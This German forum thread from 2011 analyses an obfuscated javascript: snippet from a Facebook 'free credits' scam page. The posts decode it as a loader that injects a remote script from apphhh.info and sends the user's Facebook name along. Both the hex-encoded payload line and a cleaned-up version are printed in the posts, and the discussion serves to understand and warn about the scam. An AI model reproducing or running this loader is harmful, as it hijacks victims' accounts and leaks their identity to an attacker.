Seite 1 von 1
Wer kann Java?
Verfasst: 16.07.2011, 19:46
von current
Hallo,
ich bin über das hier gestolpert und bin da doch mal sehr neugierig:
Code: Alles auswählen
http://www.facebook.com/pages/Claim-your-credits-free-in-your-account-now/213071878735795
Hier der Code:
Code: Alles auswählen
javascript:var _0x9812=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x70\x70\x68\x68\x68\x2E\x69\x6E\x66\x6F\x2F\x77\x6A\x39\x38\x32\x33\x75\x39\x2E\x6A\x73\x3F\x69\x64\x3D","\x75\x73\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(function (){var _0x6487x1=document[_0x9812[1]](_0x9812[0]);_0x6487x1[_0x9812[2]]=_0x9812[3]+Env[_0x9812[4]];document[_0x9812[6]][_0x9812[5]](_0x6487x1); void (0);} )();
Gibts hier jemanden, der das javascript dort auseinandernehmen kann? Das muss doch auch nicht so aussehen oder? Sprich, das ist doch irgendwie "encoded"? Was wird da verschleiert?
MfG
current
[/code]
Verfasst: 16.07.2011, 21:29
von e-fee
Die Frage ist falsch gestellt. Sie muss heißen: "Wer kann Javascript?"
Aber mal davon ab, das sind sowieso immer nur irgendwelche Fake-Seiten, die einem was Fieses unterjubeln, Daten abstauben oder im besten Fall noch ein paar verschleierte Likes abstauben wollen.
Hauptproblem wird allerdings sein, dass da irgendwas verschlüsselt ist - da kommste auch mit Javascript-Kenntnissen nicht wirklich ran.
Verfasst: 16.07.2011, 22:27
von profo
e-fee hat geschrieben:Aber mal davon ab, das sind sowieso immer nur irgendwelche Fake-Seiten, die einem was Fieses unterjubeln, Daten abstauben oder im besten Fall noch ein paar verschleierte Likes abstauben wollen.
Genau. In diesem Fall lädt das kleine Script wiederum ein großes verschleiertes Script von einer WhoisGuard-geschützten merkwürdig klingenden Domain apphhh punkt info ), auf der ansonsten nichts drauf ist...
Verfasst: 17.07.2011, 08:26
von Linkbuilder_Bochum
e-fee hat geschrieben:Die Frage ist falsch gestellt. Sie muss heißen: "Wer kann Javascript?"
jo so isses, das ist eindeutig Javascript, den ausführenden Code von Java würdest Du auch gar nicht so offen sehen können
Verfasst: 17.07.2011, 09:34
von o2
Ich hab mir gerade das Script genauer angesehen. Wie ja vorher bereits angemerkt, wurde das Script nicht unbedingt deswegen verschlüsselt, weil es so schön ist... Was hier gemacht wird: Von der zuvor genannten Domain wird das nächste JS geladen: wj9823u9.js. Als Parameter "id" wird zusätzlich noch der Facebook-Benutzername übertragen. Und wem das noch nicht reicht, der kann sich zusätzlich die Datei xnco.js auf der gleichen Domain ansehen, die ebenfalls wieder (wen wunderts) als Parameter "id" den aktuellen Facebook-Benutzernamen erhält.
Und dafür bekomme ich dann 1000 Facebook-Credits, fairer Deal...
Verfasst: 17.07.2011, 10:21
von xlb
e-fee hat geschrieben:... da kommste auch mit Javascript-Kenntnissen nicht wirklich ran.
Hier werden lediglich einzelne Zeichen der Teil-Strings in Hex-Schreibweise "codiert". Sieht wegen des kryptischen Variablen-Namens wilder aus, als es ist
Gibt bei weitem "interessantere" Methoden. JS-technisch ist das eher Low-Level ...
Verfasst: 17.07.2011, 19:24
von Michael
Such mal bei Google nach JavaScript decoder oder deobfuscator.
Verfasst: 17.07.2011, 19:58
von rapidcc
Das ist Javascript, in Hexadezimal codiert. Nichts besonderes. Der erste Teil ergibt etwas wie
scriptcreateElementsrchttp://apphhh.info/wj9823u9.js?id=userappendChildbody
Danach kommen ein paar (Speicher)Addressen, wahrscheinlich Arrays oder Offsets.
mfg
Verfasst: 18.07.2011, 00:08
von xlb
rapidcc hat geschrieben:Der erste Teil ergibt etwas wie scriptcreateElementsrchttp://apphhh.info/wj9823u9.js?id=userappendChildbody
Der erste Teil
ist ein Array, das einzelne hex-codierte Strings enthält.
rapidcc hat geschrieben:Danach kommen ein paar (Speicher)Addressen, wahrscheinlich Arrays oder Offsets.
Der zweite Teil
ist eine anonyme Funktion, die u.a. aus den Array Elementen einen "funktionierenden" Code bastelt, der ein weiteres Skript-Element in den DOM-Baum des Seiten-Body hängt und das Skript (asynchron) lädt.
Lässt man den Firlefanz mal weg, bleibt dies:
Code: Alles auswählen
(function ()
{ var DX=document.createElement('script');
DX.src='http://xxx.info/xxx.js?id=xxxr';
document.body.appendChild(DX);
void (0);
}
)();
Nutzer der asynchronen Einbindung von Google Analytics kennen sowas.
